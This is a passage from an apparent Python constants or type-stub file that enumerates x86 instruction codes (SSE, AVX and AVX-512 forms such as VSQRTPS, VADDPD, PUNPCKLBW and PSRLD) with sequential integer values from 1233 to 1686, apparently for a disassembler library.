VEX_KXNORW_KR_KR_KR: int = 1233
VEX_KXNORQ_KR_KR_KR: int = 1234
VEX_KXNORB_KR_KR_KR: int = 1235
VEX_KXNORD_KR_KR_KR: int = 1236
VEX_KXORW_KR_KR_KR: int = 1237
VEX_KXORQ_KR_KR_KR: int = 1238
VEX_KXORB_KR_KR_KR: int = 1239
VEX_KXORD_KR_KR_KR: int = 1240
VEX_KADDW_KR_KR_KR: int = 1241
VEX_KADDQ_KR_KR_KR: int = 1242
VEX_KADDB_KR_KR_KR: int = 1243
VEX_KADDD_KR_KR_KR: int = 1244
VEX_KUNPCKWD_KR_KR_KR: int = 1245
VEX_KUNPCKDQ_KR_KR_KR: int = 1246
VEX_KUNPCKBW_KR_KR_KR: int = 1247
MOVMSKPS_R32_XMM: int = 1248
MOVMSKPS_R64_XMM: int = 1249
VEX_VMOVMSKPS_R32_XMM: int = 1250
VEX_VMOVMSKPS_R64_XMM: int = 1251
VEX_VMOVMSKPS_R32_YMM: int = 1252
VEX_VMOVMSKPS_R64_YMM: int = 1253
MOVMSKPD_R32_XMM: int = 1254
MOVMSKPD_R64_XMM: int = 1255
VEX_VMOVMSKPD_R32_XMM: int = 1256
VEX_VMOVMSKPD_R64_XMM: int = 1257
VEX_VMOVMSKPD_R32_YMM: int = 1258
VEX_VMOVMSKPD_R64_YMM: int = 1259
SQRTPS_XMM_XMMM128: int = 1260
VEX_VSQRTPS_XMM_XMMM128: int = 1261
VEX_VSQRTPS_YMM_YMMM256: int = 1262
EVEX_VSQRTPS_XMM_K1Z_XMMM128B32: int = 1263
EVEX_VSQRTPS_YMM_K1Z_YMMM256B32: int = 1264
EVEX_VSQRTPS_ZMM_K1Z_ZMMM512B32_ER: int = 1265
SQRTPD_XMM_XMMM128: int = 1266
VEX_VSQRTPD_XMM_XMMM128: int = 1267
VEX_VSQRTPD_YMM_YMMM256: int = 1268
EVEX_VSQRTPD_XMM_K1Z_XMMM128B64: int = 1269
EVEX_VSQRTPD_YMM_K1Z_YMMM256B64: int = 1270
EVEX_VSQRTPD_ZMM_K1Z_ZMMM512B64_ER: int = 1271
SQRTSS_XMM_XMMM32: int = 1272
VEX_VSQRTSS_XMM_XMM_XMMM32: int = 1273
EVEX_VSQRTSS_XMM_K1Z_XMM_XMMM32_ER: int = 1274
SQRTSD_XMM_XMMM64: int = 1275
VEX_VSQRTSD_XMM_XMM_XMMM64: int = 1276
EVEX_VSQRTSD_XMM_K1Z_XMM_XMMM64_ER: int = 1277
RSQRTPS_XMM_XMMM128: int = 1278
VEX_VRSQRTPS_XMM_XMMM128: int = 1279
VEX_VRSQRTPS_YMM_YMMM256: int = 1280
RSQRTSS_XMM_XMMM32: int = 1281
VEX_VRSQRTSS_XMM_XMM_XMMM32: int = 1282
RCPPS_XMM_XMMM128: int = 1283
VEX_VRCPPS_XMM_XMMM128: int = 1284
VEX_VRCPPS_YMM_YMMM256: int = 1285
RCPSS_XMM_XMMM32: int = 1286
VEX_VRCPSS_XMM_XMM_XMMM32: int = 1287
ANDPS_XMM_XMMM128: int = 1288
VEX_VANDPS_XMM_XMM_XMMM128: int = 1289
VEX_VANDPS_YMM_YMM_YMMM256: int = 1290
EVEX_VANDPS_XMM_K1Z_XMM_XMMM128B32: int = 1291
EVEX_VANDPS_YMM_K1Z_YMM_YMMM256B32: int = 1292
EVEX_VANDPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1293
ANDPD_XMM_XMMM128: int = 1294
VEX_VANDPD_XMM_XMM_XMMM128: int = 1295
VEX_VANDPD_YMM_YMM_YMMM256: int = 1296
EVEX_VANDPD_XMM_K1Z_XMM_XMMM128B64: int = 1297
EVEX_VANDPD_YMM_K1Z_YMM_YMMM256B64: int = 1298
EVEX_VANDPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1299
ANDNPS_XMM_XMMM128: int = 1300
VEX_VANDNPS_XMM_XMM_XMMM128: int = 1301
VEX_VANDNPS_YMM_YMM_YMMM256: int = 1302
EVEX_VANDNPS_XMM_K1Z_XMM_XMMM128B32: int = 1303
EVEX_VANDNPS_YMM_K1Z_YMM_YMMM256B32: int = 1304
EVEX_VANDNPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1305
ANDNPD_XMM_XMMM128: int = 1306
VEX_VANDNPD_XMM_XMM_XMMM128: int = 1307
VEX_VANDNPD_YMM_YMM_YMMM256: int = 1308
EVEX_VANDNPD_XMM_K1Z_XMM_XMMM128B64: int = 1309
EVEX_VANDNPD_YMM_K1Z_YMM_YMMM256B64: int = 1310
EVEX_VANDNPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1311
ORPS_XMM_XMMM128: int = 1312
VEX_VORPS_XMM_XMM_XMMM128: int = 1313
VEX_VORPS_YMM_YMM_YMMM256: int = 1314
EVEX_VORPS_XMM_K1Z_XMM_XMMM128B32: int = 1315
EVEX_VORPS_YMM_K1Z_YMM_YMMM256B32: int = 1316
EVEX_VORPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1317
ORPD_XMM_XMMM128: int = 1318
VEX_VORPD_XMM_XMM_XMMM128: int = 1319
VEX_VORPD_YMM_YMM_YMMM256: int = 1320
EVEX_VORPD_XMM_K1Z_XMM_XMMM128B64: int = 1321
EVEX_VORPD_YMM_K1Z_YMM_YMMM256B64: int = 1322
EVEX_VORPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1323
XORPS_XMM_XMMM128: int = 1324
VEX_VXORPS_XMM_XMM_XMMM128: int = 1325
VEX_VXORPS_YMM_YMM_YMMM256: int = 1326
EVEX_VXORPS_XMM_K1Z_XMM_XMMM128B32: int = 1327
EVEX_VXORPS_YMM_K1Z_YMM_YMMM256B32: int = 1328
EVEX_VXORPS_ZMM_K1Z_ZMM_ZMMM512B32: int = 1329
XORPD_XMM_XMMM128: int = 1330
VEX_VXORPD_XMM_XMM_XMMM128: int = 1331
VEX_VXORPD_YMM_YMM_YMMM256: int = 1332
EVEX_VXORPD_XMM_K1Z_XMM_XMMM128B64: int = 1333
EVEX_VXORPD_YMM_K1Z_YMM_YMMM256B64: int = 1334
EVEX_VXORPD_ZMM_K1Z_ZMM_ZMMM512B64: int = 1335
ADDPS_XMM_XMMM128: int = 1336
VEX_VADDPS_XMM_XMM_XMMM128: int = 1337
VEX_VADDPS_YMM_YMM_YMMM256: int = 1338
EVEX_VADDPS_XMM_K1Z_XMM_XMMM128B32: int = 1339
EVEX_VADDPS_YMM_K1Z_YMM_YMMM256B32: int = 1340
EVEX_VADDPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1341
ADDPD_XMM_XMMM128: int = 1342
VEX_VADDPD_XMM_XMM_XMMM128: int = 1343
VEX_VADDPD_YMM_YMM_YMMM256: int = 1344
EVEX_VADDPD_XMM_K1Z_XMM_XMMM128B64: int = 1345
EVEX_VADDPD_YMM_K1Z_YMM_YMMM256B64: int = 1346
EVEX_VADDPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1347
ADDSS_XMM_XMMM32: int = 1348
VEX_VADDSS_XMM_XMM_XMMM32: int = 1349
EVEX_VADDSS_XMM_K1Z_XMM_XMMM32_ER: int = 1350
ADDSD_XMM_XMMM64: int = 1351
VEX_VADDSD_XMM_XMM_XMMM64: int = 1352
EVEX_VADDSD_XMM_K1Z_XMM_XMMM64_ER: int = 1353
MULPS_XMM_XMMM128: int = 1354
VEX_VMULPS_XMM_XMM_XMMM128: int = 1355
VEX_VMULPS_YMM_YMM_YMMM256: int = 1356
EVEX_VMULPS_XMM_K1Z_XMM_XMMM128B32: int = 1357
EVEX_VMULPS_YMM_K1Z_YMM_YMMM256B32: int = 1358
EVEX_VMULPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1359
MULPD_XMM_XMMM128: int = 1360
VEX_VMULPD_XMM_XMM_XMMM128: int = 1361
VEX_VMULPD_YMM_YMM_YMMM256: int = 1362
EVEX_VMULPD_XMM_K1Z_XMM_XMMM128B64: int = 1363
EVEX_VMULPD_YMM_K1Z_YMM_YMMM256B64: int = 1364
EVEX_VMULPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1365
MULSS_XMM_XMMM32: int = 1366
VEX_VMULSS_XMM_XMM_XMMM32: int = 1367
EVEX_VMULSS_XMM_K1Z_XMM_XMMM32_ER: int = 1368
MULSD_XMM_XMMM64: int = 1369
VEX_VMULSD_XMM_XMM_XMMM64: int = 1370
EVEX_VMULSD_XMM_K1Z_XMM_XMMM64_ER: int = 1371
CVTPS2PD_XMM_XMMM64: int = 1372
VEX_VCVTPS2PD_XMM_XMMM64: int = 1373
VEX_VCVTPS2PD_YMM_XMMM128: int = 1374
EVEX_VCVTPS2PD_XMM_K1Z_XMMM64B32: int = 1375
EVEX_VCVTPS2PD_YMM_K1Z_XMMM128B32: int = 1376
EVEX_VCVTPS2PD_ZMM_K1Z_YMMM256B32_SAE: int = 1377
CVTPD2PS_XMM_XMMM128: int = 1378
VEX_VCVTPD2PS_XMM_XMMM128: int = 1379
VEX_VCVTPD2PS_XMM_YMMM256: int = 1380
EVEX_VCVTPD2PS_XMM_K1Z_XMMM128B64: int = 1381
EVEX_VCVTPD2PS_XMM_K1Z_YMMM256B64: int = 1382
EVEX_VCVTPD2PS_YMM_K1Z_ZMMM512B64_ER: int = 1383
CVTSS2SD_XMM_XMMM32: int = 1384
VEX_VCVTSS2SD_XMM_XMM_XMMM32: int = 1385
EVEX_VCVTSS2SD_XMM_K1Z_XMM_XMMM32_SAE: int = 1386
CVTSD2SS_XMM_XMMM64: int = 1387
VEX_VCVTSD2SS_XMM_XMM_XMMM64: int = 1388
EVEX_VCVTSD2SS_XMM_K1Z_XMM_XMMM64_ER: int = 1389
CVTDQ2PS_XMM_XMMM128: int = 1390
VEX_VCVTDQ2PS_XMM_XMMM128: int = 1391
VEX_VCVTDQ2PS_YMM_YMMM256: int = 1392
EVEX_VCVTDQ2PS_XMM_K1Z_XMMM128B32: int = 1393
EVEX_VCVTDQ2PS_YMM_K1Z_YMMM256B32: int = 1394
EVEX_VCVTDQ2PS_ZMM_K1Z_ZMMM512B32_ER: int = 1395
EVEX_VCVTQQ2PS_XMM_K1Z_XMMM128B64: int = 1396
EVEX_VCVTQQ2PS_XMM_K1Z_YMMM256B64: int = 1397
EVEX_VCVTQQ2PS_YMM_K1Z_ZMMM512B64_ER: int = 1398
CVTPS2DQ_XMM_XMMM128: int = 1399
VEX_VCVTPS2DQ_XMM_XMMM128: int = 1400
VEX_VCVTPS2DQ_YMM_YMMM256: int = 1401
EVEX_VCVTPS2DQ_XMM_K1Z_XMMM128B32: int = 1402
EVEX_VCVTPS2DQ_YMM_K1Z_YMMM256B32: int = 1403
EVEX_VCVTPS2DQ_ZMM_K1Z_ZMMM512B32_ER: int = 1404
CVTTPS2DQ_XMM_XMMM128: int = 1405
VEX_VCVTTPS2DQ_XMM_XMMM128: int = 1406
VEX_VCVTTPS2DQ_YMM_YMMM256: int = 1407
EVEX_VCVTTPS2DQ_XMM_K1Z_XMMM128B32: int = 1408
EVEX_VCVTTPS2DQ_YMM_K1Z_YMMM256B32: int = 1409
EVEX_VCVTTPS2DQ_ZMM_K1Z_ZMMM512B32_SAE: int = 1410
SUBPS_XMM_XMMM128: int = 1411
VEX_VSUBPS_XMM_XMM_XMMM128: int = 1412
VEX_VSUBPS_YMM_YMM_YMMM256: int = 1413
EVEX_VSUBPS_XMM_K1Z_XMM_XMMM128B32: int = 1414
EVEX_VSUBPS_YMM_K1Z_YMM_YMMM256B32: int = 1415
EVEX_VSUBPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1416
SUBPD_XMM_XMMM128: int = 1417
VEX_VSUBPD_XMM_XMM_XMMM128: int = 1418
VEX_VSUBPD_YMM_YMM_YMMM256: int = 1419
EVEX_VSUBPD_XMM_K1Z_XMM_XMMM128B64: int = 1420
EVEX_VSUBPD_YMM_K1Z_YMM_YMMM256B64: int = 1421
EVEX_VSUBPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1422
SUBSS_XMM_XMMM32: int = 1423
VEX_VSUBSS_XMM_XMM_XMMM32: int = 1424
EVEX_VSUBSS_XMM_K1Z_XMM_XMMM32_ER: int = 1425
SUBSD_XMM_XMMM64: int = 1426
VEX_VSUBSD_XMM_XMM_XMMM64: int = 1427
EVEX_VSUBSD_XMM_K1Z_XMM_XMMM64_ER: int = 1428
MINPS_XMM_XMMM128: int = 1429
VEX_VMINPS_XMM_XMM_XMMM128: int = 1430
VEX_VMINPS_YMM_YMM_YMMM256: int = 1431
EVEX_VMINPS_XMM_K1Z_XMM_XMMM128B32: int = 1432
EVEX_VMINPS_YMM_K1Z_YMM_YMMM256B32: int = 1433
EVEX_VMINPS_ZMM_K1Z_ZMM_ZMMM512B32_SAE: int = 1434
MINPD_XMM_XMMM128: int = 1435
VEX_VMINPD_XMM_XMM_XMMM128: int = 1436
VEX_VMINPD_YMM_YMM_YMMM256: int = 1437
EVEX_VMINPD_XMM_K1Z_XMM_XMMM128B64: int = 1438
EVEX_VMINPD_YMM_K1Z_YMM_YMMM256B64: int = 1439
EVEX_VMINPD_ZMM_K1Z_ZMM_ZMMM512B64_SAE: int = 1440
MINSS_XMM_XMMM32: int = 1441
VEX_VMINSS_XMM_XMM_XMMM32: int = 1442
EVEX_VMINSS_XMM_K1Z_XMM_XMMM32_SAE: int = 1443
MINSD_XMM_XMMM64: int = 1444
VEX_VMINSD_XMM_XMM_XMMM64: int = 1445
EVEX_VMINSD_XMM_K1Z_XMM_XMMM64_SAE: int = 1446
DIVPS_XMM_XMMM128: int = 1447
VEX_VDIVPS_XMM_XMM_XMMM128: int = 1448
VEX_VDIVPS_YMM_YMM_YMMM256: int = 1449
EVEX_VDIVPS_XMM_K1Z_XMM_XMMM128B32: int = 1450
EVEX_VDIVPS_YMM_K1Z_YMM_YMMM256B32: int = 1451
EVEX_VDIVPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 1452
DIVPD_XMM_XMMM128: int = 1453
VEX_VDIVPD_XMM_XMM_XMMM128: int = 1454
VEX_VDIVPD_YMM_YMM_YMMM256: int = 1455
EVEX_VDIVPD_XMM_K1Z_XMM_XMMM128B64: int = 1456
EVEX_VDIVPD_YMM_K1Z_YMM_YMMM256B64: int = 1457
EVEX_VDIVPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 1458
DIVSS_XMM_XMMM32: int = 1459
VEX_VDIVSS_XMM_XMM_XMMM32: int = 1460
EVEX_VDIVSS_XMM_K1Z_XMM_XMMM32_ER: int = 1461
DIVSD_XMM_XMMM64: int = 1462
VEX_VDIVSD_XMM_XMM_XMMM64: int = 1463
EVEX_VDIVSD_XMM_K1Z_XMM_XMMM64_ER: int = 1464
MAXPS_XMM_XMMM128: int = 1465
VEX_VMAXPS_XMM_XMM_XMMM128: int = 1466
VEX_VMAXPS_YMM_YMM_YMMM256: int = 1467
EVEX_VMAXPS_XMM_K1Z_XMM_XMMM128B32: int = 1468
EVEX_VMAXPS_YMM_K1Z_YMM_YMMM256B32: int = 1469
EVEX_VMAXPS_ZMM_K1Z_ZMM_ZMMM512B32_SAE: int = 1470
MAXPD_XMM_XMMM128: int = 1471
VEX_VMAXPD_XMM_XMM_XMMM128: int = 1472
VEX_VMAXPD_YMM_YMM_YMMM256: int = 1473
EVEX_VMAXPD_XMM_K1Z_XMM_XMMM128B64: int = 1474
EVEX_VMAXPD_YMM_K1Z_YMM_YMMM256B64: int = 1475
EVEX_VMAXPD_ZMM_K1Z_ZMM_ZMMM512B64_SAE: int = 1476
MAXSS_XMM_XMMM32: int = 1477
VEX_VMAXSS_XMM_XMM_XMMM32: int = 1478
EVEX_VMAXSS_XMM_K1Z_XMM_XMMM32_SAE: int = 1479
MAXSD_XMM_XMMM64: int = 1480
VEX_VMAXSD_XMM_XMM_XMMM64: int = 1481
EVEX_VMAXSD_XMM_K1Z_XMM_XMMM64_SAE: int = 1482
PUNPCKLBW_MM_MMM32: int = 1483
PUNPCKLBW_XMM_XMMM128: int = 1484
VEX_VPUNPCKLBW_XMM_XMM_XMMM128: int = 1485
VEX_VPUNPCKLBW_YMM_YMM_YMMM256: int = 1486
EVEX_VPUNPCKLBW_XMM_K1Z_XMM_XMMM128: int = 1487
EVEX_VPUNPCKLBW_YMM_K1Z_YMM_YMMM256: int = 1488
EVEX_VPUNPCKLBW_ZMM_K1Z_ZMM_ZMMM512: int = 1489
PUNPCKLWD_MM_MMM32: int = 1490
PUNPCKLWD_XMM_XMMM128: int = 1491
VEX_VPUNPCKLWD_XMM_XMM_XMMM128: int = 1492
VEX_VPUNPCKLWD_YMM_YMM_YMMM256: int = 1493
EVEX_VPUNPCKLWD_XMM_K1Z_XMM_XMMM128: int = 1494
EVEX_VPUNPCKLWD_YMM_K1Z_YMM_YMMM256: int = 1495
EVEX_VPUNPCKLWD_ZMM_K1Z_ZMM_ZMMM512: int = 1496
PUNPCKLDQ_MM_MMM32: int = 1497
PUNPCKLDQ_XMM_XMMM128: int = 1498
VEX_VPUNPCKLDQ_XMM_XMM_XMMM128: int = 1499
VEX_VPUNPCKLDQ_YMM_YMM_YMMM256: int = 1500
EVEX_VPUNPCKLDQ_XMM_K1Z_XMM_XMMM128B32: int = 1501
EVEX_VPUNPCKLDQ_YMM_K1Z_YMM_YMMM256B32: int = 1502
EVEX_VPUNPCKLDQ_ZMM_K1Z_ZMM_ZMMM512B32: int = 1503
PACKSSWB_MM_MMM64: int = 1504
PACKSSWB_XMM_XMMM128: int = 1505
VEX_VPACKSSWB_XMM_XMM_XMMM128: int = 1506
VEX_VPACKSSWB_YMM_YMM_YMMM256: int = 1507
EVEX_VPACKSSWB_XMM_K1Z_XMM_XMMM128: int = 1508
EVEX_VPACKSSWB_YMM_K1Z_YMM_YMMM256: int = 1509
EVEX_VPACKSSWB_ZMM_K1Z_ZMM_ZMMM512: int = 1510
PCMPGTB_MM_MMM64: int = 1511
PCMPGTB_XMM_XMMM128: int = 1512
VEX_VPCMPGTB_XMM_XMM_XMMM128: int = 1513
VEX_VPCMPGTB_YMM_YMM_YMMM256: int = 1514
EVEX_VPCMPGTB_KR_K1_XMM_XMMM128: int = 1515
EVEX_VPCMPGTB_KR_K1_YMM_YMMM256: int = 1516
EVEX_VPCMPGTB_KR_K1_ZMM_ZMMM512: int = 1517
PCMPGTW_MM_MMM64: int = 1518
PCMPGTW_XMM_XMMM128: int = 1519
VEX_VPCMPGTW_XMM_XMM_XMMM128: int = 1520
VEX_VPCMPGTW_YMM_YMM_YMMM256: int = 1521
EVEX_VPCMPGTW_KR_K1_XMM_XMMM128: int = 1522
EVEX_VPCMPGTW_KR_K1_YMM_YMMM256: int = 1523
EVEX_VPCMPGTW_KR_K1_ZMM_ZMMM512: int = 1524
PCMPGTD_MM_MMM64: int = 1525
PCMPGTD_XMM_XMMM128: int = 1526
VEX_VPCMPGTD_XMM_XMM_XMMM128: int = 1527
VEX_VPCMPGTD_YMM_YMM_YMMM256: int = 1528
EVEX_VPCMPGTD_KR_K1_XMM_XMMM128B32: int = 1529
EVEX_VPCMPGTD_KR_K1_YMM_YMMM256B32: int = 1530
EVEX_VPCMPGTD_KR_K1_ZMM_ZMMM512B32: int = 1531
PACKUSWB_MM_MMM64: int = 1532
PACKUSWB_XMM_XMMM128: int = 1533
VEX_VPACKUSWB_XMM_XMM_XMMM128: int = 1534
VEX_VPACKUSWB_YMM_YMM_YMMM256: int = 1535
EVEX_VPACKUSWB_XMM_K1Z_XMM_XMMM128: int = 1536
EVEX_VPACKUSWB_YMM_K1Z_YMM_YMMM256: int = 1537
EVEX_VPACKUSWB_ZMM_K1Z_ZMM_ZMMM512: int = 1538
PUNPCKHBW_MM_MMM64: int = 1539
PUNPCKHBW_XMM_XMMM128: int = 1540
VEX_VPUNPCKHBW_XMM_XMM_XMMM128: int = 1541
VEX_VPUNPCKHBW_YMM_YMM_YMMM256: int = 1542
EVEX_VPUNPCKHBW_XMM_K1Z_XMM_XMMM128: int = 1543
EVEX_VPUNPCKHBW_YMM_K1Z_YMM_YMMM256: int = 1544
EVEX_VPUNPCKHBW_ZMM_K1Z_ZMM_ZMMM512: int = 1545
PUNPCKHWD_MM_MMM64: int = 1546
PUNPCKHWD_XMM_XMMM128: int = 1547
VEX_VPUNPCKHWD_XMM_XMM_XMMM128: int = 1548
VEX_VPUNPCKHWD_YMM_YMM_YMMM256: int = 1549
EVEX_VPUNPCKHWD_XMM_K1Z_XMM_XMMM128: int = 1550
EVEX_VPUNPCKHWD_YMM_K1Z_YMM_YMMM256: int = 1551
EVEX_VPUNPCKHWD_ZMM_K1Z_ZMM_ZMMM512: int = 1552
PUNPCKHDQ_MM_MMM64: int = 1553
PUNPCKHDQ_XMM_XMMM128: int = 1554
VEX_VPUNPCKHDQ_XMM_XMM_XMMM128: int = 1555
VEX_VPUNPCKHDQ_YMM_YMM_YMMM256: int = 1556
EVEX_VPUNPCKHDQ_XMM_K1Z_XMM_XMMM128B32: int = 1557
EVEX_VPUNPCKHDQ_YMM_K1Z_YMM_YMMM256B32: int = 1558
EVEX_VPUNPCKHDQ_ZMM_K1Z_ZMM_ZMMM512B32: int = 1559
PACKSSDW_MM_MMM64: int = 1560
PACKSSDW_XMM_XMMM128: int = 1561
VEX_VPACKSSDW_XMM_XMM_XMMM128: int = 1562
VEX_VPACKSSDW_YMM_YMM_YMMM256: int = 1563
EVEX_VPACKSSDW_XMM_K1Z_XMM_XMMM128B32: int = 1564
EVEX_VPACKSSDW_YMM_K1Z_YMM_YMMM256B32: int = 1565
EVEX_VPACKSSDW_ZMM_K1Z_ZMM_ZMMM512B32: int = 1566
PUNPCKLQDQ_XMM_XMMM128: int = 1567
VEX_VPUNPCKLQDQ_XMM_XMM_XMMM128: int = 1568
VEX_VPUNPCKLQDQ_YMM_YMM_YMMM256: int = 1569
EVEX_VPUNPCKLQDQ_XMM_K1Z_XMM_XMMM128B64: int = 1570
EVEX_VPUNPCKLQDQ_YMM_K1Z_YMM_YMMM256B64: int = 1571
EVEX_VPUNPCKLQDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 1572
PUNPCKHQDQ_XMM_XMMM128: int = 1573
VEX_VPUNPCKHQDQ_XMM_XMM_XMMM128: int = 1574
VEX_VPUNPCKHQDQ_YMM_YMM_YMMM256: int = 1575
EVEX_VPUNPCKHQDQ_XMM_K1Z_XMM_XMMM128B64: int = 1576
EVEX_VPUNPCKHQDQ_YMM_K1Z_YMM_YMMM256B64: int = 1577
EVEX_VPUNPCKHQDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 1578
MOVD_MM_RM32: int = 1579
MOVQ_MM_RM64: int = 1580
MOVD_XMM_RM32: int = 1581
MOVQ_XMM_RM64: int = 1582
VEX_VMOVD_XMM_RM32: int = 1583
VEX_VMOVQ_XMM_RM64: int = 1584
EVEX_VMOVD_XMM_RM32: int = 1585
EVEX_VMOVQ_XMM_RM64: int = 1586
MOVQ_MM_MMM64: int = 1587
MOVDQA_XMM_XMMM128: int = 1588
VEX_VMOVDQA_XMM_XMMM128: int = 1589
VEX_VMOVDQA_YMM_YMMM256: int = 1590
EVEX_VMOVDQA32_XMM_K1Z_XMMM128: int = 1591
EVEX_VMOVDQA32_YMM_K1Z_YMMM256: int = 1592
EVEX_VMOVDQA32_ZMM_K1Z_ZMMM512: int = 1593
EVEX_VMOVDQA64_XMM_K1Z_XMMM128: int = 1594
EVEX_VMOVDQA64_YMM_K1Z_YMMM256: int = 1595
EVEX_VMOVDQA64_ZMM_K1Z_ZMMM512: int = 1596
MOVDQU_XMM_XMMM128: int = 1597
VEX_VMOVDQU_XMM_XMMM128: int = 1598
VEX_VMOVDQU_YMM_YMMM256: int = 1599
EVEX_VMOVDQU32_XMM_K1Z_XMMM128: int = 1600
EVEX_VMOVDQU32_YMM_K1Z_YMMM256: int = 1601
EVEX_VMOVDQU32_ZMM_K1Z_ZMMM512: int = 1602
EVEX_VMOVDQU64_XMM_K1Z_XMMM128: int = 1603
EVEX_VMOVDQU64_YMM_K1Z_YMMM256: int = 1604
EVEX_VMOVDQU64_ZMM_K1Z_ZMMM512: int = 1605
EVEX_VMOVDQU8_XMM_K1Z_XMMM128: int = 1606
EVEX_VMOVDQU8_YMM_K1Z_YMMM256: int = 1607
EVEX_VMOVDQU8_ZMM_K1Z_ZMMM512: int = 1608
EVEX_VMOVDQU16_XMM_K1Z_XMMM128: int = 1609
EVEX_VMOVDQU16_YMM_K1Z_YMMM256: int = 1610
EVEX_VMOVDQU16_ZMM_K1Z_ZMMM512: int = 1611
PSHUFW_MM_MMM64_IMM8: int = 1612
PSHUFD_XMM_XMMM128_IMM8: int = 1613
VEX_VPSHUFD_XMM_XMMM128_IMM8: int = 1614
VEX_VPSHUFD_YMM_YMMM256_IMM8: int = 1615
EVEX_VPSHUFD_XMM_K1Z_XMMM128B32_IMM8: int = 1616
EVEX_VPSHUFD_YMM_K1Z_YMMM256B32_IMM8: int = 1617
EVEX_VPSHUFD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1618
PSHUFHW_XMM_XMMM128_IMM8: int = 1619
VEX_VPSHUFHW_XMM_XMMM128_IMM8: int = 1620
VEX_VPSHUFHW_YMM_YMMM256_IMM8: int = 1621
EVEX_VPSHUFHW_XMM_K1Z_XMMM128_IMM8: int = 1622
EVEX_VPSHUFHW_YMM_K1Z_YMMM256_IMM8: int = 1623
EVEX_VPSHUFHW_ZMM_K1Z_ZMMM512_IMM8: int = 1624
PSHUFLW_XMM_XMMM128_IMM8: int = 1625
VEX_VPSHUFLW_XMM_XMMM128_IMM8: int = 1626
VEX_VPSHUFLW_YMM_YMMM256_IMM8: int = 1627
EVEX_VPSHUFLW_XMM_K1Z_XMMM128_IMM8: int = 1628
EVEX_VPSHUFLW_YMM_K1Z_YMMM256_IMM8: int = 1629
EVEX_VPSHUFLW_ZMM_K1Z_ZMMM512_IMM8: int = 1630
PSRLW_MM_IMM8: int = 1631
PSRLW_XMM_IMM8: int = 1632
VEX_VPSRLW_XMM_XMM_IMM8: int = 1633
VEX_VPSRLW_YMM_YMM_IMM8: int = 1634
EVEX_VPSRLW_XMM_K1Z_XMMM128_IMM8: int = 1635
EVEX_VPSRLW_YMM_K1Z_YMMM256_IMM8: int = 1636
EVEX_VPSRLW_ZMM_K1Z_ZMMM512_IMM8: int = 1637
PSRAW_MM_IMM8: int = 1638
PSRAW_XMM_IMM8: int = 1639
VEX_VPSRAW_XMM_XMM_IMM8: int = 1640
VEX_VPSRAW_YMM_YMM_IMM8: int = 1641
EVEX_VPSRAW_XMM_K1Z_XMMM128_IMM8: int = 1642
EVEX_VPSRAW_YMM_K1Z_YMMM256_IMM8: int = 1643
EVEX_VPSRAW_ZMM_K1Z_ZMMM512_IMM8: int = 1644
PSLLW_MM_IMM8: int = 1645
PSLLW_XMM_IMM8: int = 1646
VEX_VPSLLW_XMM_XMM_IMM8: int = 1647
VEX_VPSLLW_YMM_YMM_IMM8: int = 1648
EVEX_VPSLLW_XMM_K1Z_XMMM128_IMM8: int = 1649
EVEX_VPSLLW_YMM_K1Z_YMMM256_IMM8: int = 1650
EVEX_VPSLLW_ZMM_K1Z_ZMMM512_IMM8: int = 1651
EVEX_VPRORD_XMM_K1Z_XMMM128B32_IMM8: int = 1652
EVEX_VPRORD_YMM_K1Z_YMMM256B32_IMM8: int = 1653
EVEX_VPRORD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1654
EVEX_VPRORQ_XMM_K1Z_XMMM128B64_IMM8: int = 1655
EVEX_VPRORQ_YMM_K1Z_YMMM256B64_IMM8: int = 1656
EVEX_VPRORQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1657
EVEX_VPROLD_XMM_K1Z_XMMM128B32_IMM8: int = 1658
EVEX_VPROLD_YMM_K1Z_YMMM256B32_IMM8: int = 1659
EVEX_VPROLD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1660
EVEX_VPROLQ_XMM_K1Z_XMMM128B64_IMM8: int = 1661
EVEX_VPROLQ_YMM_K1Z_YMMM256B64_IMM8: int = 1662
EVEX_VPROLQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1663
PSRLD_MM_IMM8: int = 1664
PSRLD_XMM_IMM8: int = 1665
VEX_VPSRLD_XMM_XMM_IMM8: int = 1666
VEX_VPSRLD_YMM_YMM_IMM8: int = 1667
EVEX_VPSRLD_XMM_K1Z_XMMM128B32_IMM8: int = 1668
EVEX_VPSRLD_YMM_K1Z_YMMM256B32_IMM8: int = 1669
EVEX_VPSRLD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1670
PSRAD_MM_IMM8: int = 1671
PSRAD_XMM_IMM8: int = 1672
VEX_VPSRAD_XMM_XMM_IMM8: int = 1673
VEX_VPSRAD_YMM_YMM_IMM8: int = 1674
EVEX_VPSRAD_XMM_K1Z_XMMM128B32_IMM8: int = 1675
EVEX_VPSRAD_YMM_K1Z_YMMM256B32_IMM8: int = 1676
EVEX_VPSRAD_ZMM_K1Z_ZMMM512B32_IMM8: int = 1677
EVEX_VPSRAQ_XMM_K1Z_XMMM128B64_IMM8: int = 1678
EVEX_VPSRAQ_YMM_K1Z_YMMM256B64_IMM8: int = 1679
EVEX_VPSRAQ_ZMM_K1Z_ZMMM512B64_IMM8: int = 1680
PSLLD_MM_IMM8: int = 1681
PSLLD_XMM_IMM8: int = 1682
VEX_VPSLLD_XMM_XMM_IMM8: int = 1683
VEX_VPSLLD_YMM_YMM_IMM8: int = 1684
EVEX_VPSLLD_XMM_K1Z_XMMM128B32_IMM8: int = 1685
EVEX_VPSLLD_YMM_K1Z_YMMM256B32_IMM8: int = 1686
